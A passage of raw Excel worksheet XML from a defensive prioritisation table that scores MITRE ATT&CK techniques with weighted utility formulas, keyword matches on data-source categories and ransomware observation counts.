        <f t="array" ref="AM572">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD572)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN572" s="37">
        <v>0</v>
      </c>
      <c r="AO572" s="37">
        <v>0</v>
      </c>
      <c r="AP572" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ572" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>48.707142857142856</v>
      </c>
      <c r="AR572" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS572" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT572" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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73" spans="1:47" ht="34">
      <c r="A573" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B573" s="37">
        <f t="shared" si="8"/>
        <v>113.85000000000001</v>
      </c>
      <c r="C573" s="37" t="s">
        <v>1899</v>
      </c>
      <c r="D573" s="50" t="s">
        <v>1892</v>
      </c>
      <c r="E573" s="37" t="s">
        <v>1900</v>
      </c>
      <c r="F573" s="37">
        <v>0</v>
      </c>
      <c r="G573" s="37">
        <v>1</v>
      </c>
      <c r="H573" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I573" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J573" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K573" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L573" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M573" s="37">
        <v>0</v>
      </c>
      <c r="N573" s="56">
        <v>0</v>
      </c>
      <c r="O573" s="56">
        <v>0</v>
      </c>
      <c r="P573" s="56">
        <v>0</v>
      </c>
      <c r="Q573" s="56">
        <v>0</v>
      </c>
      <c r="R573" s="57"/>
      <c r="S573" s="57">
        <v>0</v>
      </c>
      <c r="T573" s="57"/>
      <c r="U573" s="57">
        <v>0</v>
      </c>
      <c r="V573" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W573" s="37">
        <v>0</v>
      </c>
      <c r="X573" s="37">
        <v>0</v>
      </c>
      <c r="Y573" s="37">
        <v>0</v>
      </c>
      <c r="Z573" s="37">
        <v>0</v>
      </c>
      <c r="AA573" s="37">
        <v>0</v>
      </c>
      <c r="AB573" s="37">
        <v>0</v>
      </c>
      <c r="AC573" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD573" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE573" s="37" t="str" cm="1">
        <f t="array" ref="AE573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF573" s="37">
        <v>569</v>
      </c>
      <c r="AG573" s="37" t="str" cm="1">
        <f t="array" ref="AG573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH573" s="37">
        <v>569</v>
      </c>
      <c r="AI573" s="37" t="str" cm="1">
        <f t="array" ref="AI573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ573" s="37">
        <v>569</v>
      </c>
      <c r="AK573" s="37" t="str" cm="1">
        <f t="array" ref="AK573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL573" s="37">
        <v>569</v>
      </c>
      <c r="AM573" s="37" t="str" cm="1">
        <f t="array" ref="AM573">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD573)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN573" s="37">
        <v>0</v>
      </c>
      <c r="AO573" s="37">
        <v>1</v>
      </c>
      <c r="AP573" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ573" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.950000000000003</v>
      </c>
      <c r="AR573" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS573" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT573" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU57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0.92738095238095242</v>
      </c>
    </row>
    <row r="574" spans="1:47" ht="34">
      <c r="A574" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B574" s="37">
        <f t="shared" si="8"/>
        <v>114.05000000000001</v>
      </c>
      <c r="C574" s="37" t="s">
        <v>1901</v>
      </c>
      <c r="D574" s="50" t="s">
        <v>1902</v>
      </c>
      <c r="E574" s="37"/>
      <c r="F574" s="37">
        <v>0</v>
      </c>
      <c r="G574" s="37">
        <v>1</v>
      </c>
      <c r="H574" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I574" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J574" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K574" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L574" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M574" s="37">
        <v>0</v>
      </c>
      <c r="N574" s="56">
        <v>0</v>
      </c>
      <c r="O574" s="56">
        <v>0</v>
      </c>
      <c r="P574" s="56">
        <v>0</v>
      </c>
      <c r="Q574" s="56">
        <v>0</v>
      </c>
      <c r="R574" s="57"/>
      <c r="S574" s="57">
        <v>0</v>
      </c>
      <c r="T574" s="57"/>
      <c r="U574" s="57">
        <v>0</v>
      </c>
      <c r="V574" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W574" s="37">
        <v>0</v>
      </c>
      <c r="X574" s="37">
        <v>0</v>
      </c>
      <c r="Y574" s="37">
        <v>0</v>
      </c>
      <c r="Z574" s="37">
        <v>0</v>
      </c>
      <c r="AA574" s="37">
        <v>0</v>
      </c>
      <c r="AB574" s="37">
        <v>0</v>
      </c>
      <c r="AC574" s="37"/>
      <c r="AD574" s="50"/>
      <c r="AE574" s="37" t="str" cm="1">
        <f t="array" ref="AE574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF574" s="37">
        <v>570</v>
      </c>
      <c r="AG574" s="37" t="str" cm="1">
        <f t="array" ref="AG574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH574" s="37">
        <v>570</v>
      </c>
      <c r="AI574" s="37" t="str" cm="1">
        <f t="array" ref="AI574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ574" s="37">
        <v>570</v>
      </c>
      <c r="AK574" s="37" t="str" cm="1">
        <f t="array" ref="AK574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL574" s="37">
        <v>570</v>
      </c>
      <c r="AM574" s="37" t="str" cm="1">
        <f t="array" ref="AM574">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD574)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN574" s="37">
        <v>0</v>
      </c>
      <c r="AO574" s="37">
        <v>0</v>
      </c>
      <c r="AP574" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ574" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.016666666666673</v>
      </c>
      <c r="AR574" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS574" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT574" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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75" spans="1:47" ht="34">
      <c r="A575" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B575" s="37">
        <f t="shared" si="8"/>
        <v>114.25</v>
      </c>
      <c r="C575" s="37" t="s">
        <v>1903</v>
      </c>
      <c r="D575" s="50" t="s">
        <v>1902</v>
      </c>
      <c r="E575" s="37" t="s">
        <v>1904</v>
      </c>
      <c r="F575" s="37">
        <v>0</v>
      </c>
      <c r="G575" s="37">
        <v>1</v>
      </c>
      <c r="H575" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I575" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J575" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K575" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L575" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M575" s="37">
        <v>0</v>
      </c>
      <c r="N575" s="56">
        <v>0</v>
      </c>
      <c r="O575" s="56">
        <v>0</v>
      </c>
      <c r="P575" s="56">
        <v>0</v>
      </c>
      <c r="Q575" s="56">
        <v>0</v>
      </c>
      <c r="R575" s="57"/>
      <c r="S575" s="57">
        <v>0</v>
      </c>
      <c r="T575" s="57"/>
      <c r="U575" s="57">
        <v>0</v>
      </c>
      <c r="V575" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W575" s="37">
        <v>0</v>
      </c>
      <c r="X575" s="37">
        <v>0</v>
      </c>
      <c r="Y575" s="37">
        <v>0</v>
      </c>
      <c r="Z575" s="37">
        <v>0</v>
      </c>
      <c r="AA575" s="37">
        <v>0</v>
      </c>
      <c r="AB575" s="37">
        <v>0</v>
      </c>
      <c r="AC575" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD575" s="50"/>
      <c r="AE575" s="37" t="str" cm="1">
        <f t="array" ref="AE575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF575" s="37">
        <v>571</v>
      </c>
      <c r="AG575" s="37" t="str" cm="1">
        <f t="array" ref="AG575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH575" s="37">
        <v>571</v>
      </c>
      <c r="AI575" s="37" t="str" cm="1">
        <f t="array" ref="AI575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ575" s="37">
        <v>571</v>
      </c>
      <c r="AK575" s="37" t="str" cm="1">
        <f t="array" ref="AK575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL575" s="37">
        <v>571</v>
      </c>
      <c r="AM575" s="37" t="str" cm="1">
        <f t="array" ref="AM575">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD575)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN575" s="37">
        <v>0</v>
      </c>
      <c r="AO575" s="37">
        <v>0</v>
      </c>
      <c r="AP575" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ575" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.083333333333336</v>
      </c>
      <c r="AR575" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS575" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT575" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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76" spans="1:47" ht="34">
      <c r="A576" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B576" s="37">
        <f t="shared" si="8"/>
        <v>114.45</v>
      </c>
      <c r="C576" s="37" t="s">
        <v>1905</v>
      </c>
      <c r="D576" s="50" t="s">
        <v>1902</v>
      </c>
      <c r="E576" s="37" t="s">
        <v>1906</v>
      </c>
      <c r="F576" s="37">
        <v>0</v>
      </c>
      <c r="G576" s="37">
        <v>1</v>
      </c>
      <c r="H576" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I576" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J576" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K576" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L576" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M576" s="37">
        <v>0</v>
      </c>
      <c r="N576" s="56">
        <v>0</v>
      </c>
      <c r="O576" s="56">
        <v>0</v>
      </c>
      <c r="P576" s="56">
        <v>0</v>
      </c>
      <c r="Q576" s="56">
        <v>0</v>
      </c>
      <c r="R576" s="57"/>
      <c r="S576" s="57">
        <v>0</v>
      </c>
      <c r="T576" s="57"/>
      <c r="U576" s="57">
        <v>0</v>
      </c>
      <c r="V576" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W576" s="37">
        <v>0</v>
      </c>
      <c r="X576" s="37">
        <v>0</v>
      </c>
      <c r="Y576" s="37">
        <v>0</v>
      </c>
      <c r="Z576" s="37">
        <v>0</v>
      </c>
      <c r="AA576" s="37">
        <v>0</v>
      </c>
      <c r="AB576" s="37">
        <v>0</v>
      </c>
      <c r="AC576" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD576" s="50"/>
      <c r="AE576" s="37" t="str" cm="1">
        <f t="array" ref="AE576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF576" s="37">
        <v>572</v>
      </c>
      <c r="AG576" s="37" t="str" cm="1">
        <f t="array" ref="AG576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH576" s="37">
        <v>572</v>
      </c>
      <c r="AI576" s="37" t="str" cm="1">
        <f t="array" ref="AI576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ576" s="37">
        <v>572</v>
      </c>
      <c r="AK576" s="37" t="str" cm="1">
        <f t="array" ref="AK576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL576" s="37">
        <v>572</v>
      </c>
      <c r="AM576" s="37" t="str" cm="1">
        <f t="array" ref="AM576">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD576)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN576" s="37">
        <v>0</v>
      </c>
      <c r="AO576" s="37">
        <v>0</v>
      </c>
      <c r="AP576" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ576" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.15</v>
      </c>
      <c r="AR576" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS576" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT576" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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77" spans="1:47" ht="34">
      <c r="A577" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B577" s="37">
        <f t="shared" si="8"/>
        <v>114.65</v>
      </c>
      <c r="C577" s="37" t="s">
        <v>1907</v>
      </c>
      <c r="D577" s="50" t="s">
        <v>1902</v>
      </c>
      <c r="E577" s="37" t="s">
        <v>939</v>
      </c>
      <c r="F577" s="37">
        <v>0</v>
      </c>
      <c r="G577" s="37">
        <v>1</v>
      </c>
      <c r="H577" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I577" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J577" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K577" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L577" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M577" s="37">
        <v>0</v>
      </c>
      <c r="N577" s="56">
        <v>0</v>
      </c>
      <c r="O577" s="56">
        <v>0</v>
      </c>
      <c r="P577" s="56">
        <v>0</v>
      </c>
      <c r="Q577" s="56">
        <v>0</v>
      </c>
      <c r="R577" s="57"/>
      <c r="S577" s="57"/>
      <c r="T577" s="57"/>
      <c r="U577" s="57"/>
      <c r="V577" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W577" s="37">
        <v>0</v>
      </c>
      <c r="X577" s="37">
        <v>0</v>
      </c>
      <c r="Y577" s="37">
        <v>0</v>
      </c>
      <c r="Z577" s="37">
        <v>0</v>
      </c>
      <c r="AA577" s="37">
        <v>0</v>
      </c>
      <c r="AB577" s="37">
        <v>0</v>
      </c>
      <c r="AC577" s="37"/>
      <c r="AD577" s="50"/>
      <c r="AE577" s="37" t="str" cm="1">
        <f t="array" ref="AE577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF577" s="37">
        <v>573</v>
      </c>
      <c r="AG577" s="37" t="str" cm="1">
        <f t="array" ref="AG577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH577" s="37">
        <v>573</v>
      </c>
      <c r="AI577" s="37" t="str" cm="1">
        <f t="array" ref="AI577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ577" s="37">
        <v>573</v>
      </c>
      <c r="AK577" s="37" t="str" cm="1">
        <f t="array" ref="AK577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL577" s="37">
        <v>573</v>
      </c>
      <c r="AM577" s="37" t="str" cm="1">
        <f t="array" ref="AM577">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD577)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN577" s="37">
        <v>0</v>
      </c>
      <c r="AO577" s="37"/>
      <c r="AP577" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ577" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.216666666666669</v>
      </c>
      <c r="AR577" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS577" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT577" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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78" spans="1:47" ht="34">
      <c r="A578" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B578" s="37">
        <f t="shared" si="8"/>
        <v>125.78809523809524</v>
      </c>
      <c r="C578" s="37" t="s">
        <v>1908</v>
      </c>
      <c r="D578" s="50" t="s">
        <v>1909</v>
      </c>
      <c r="E578" s="37"/>
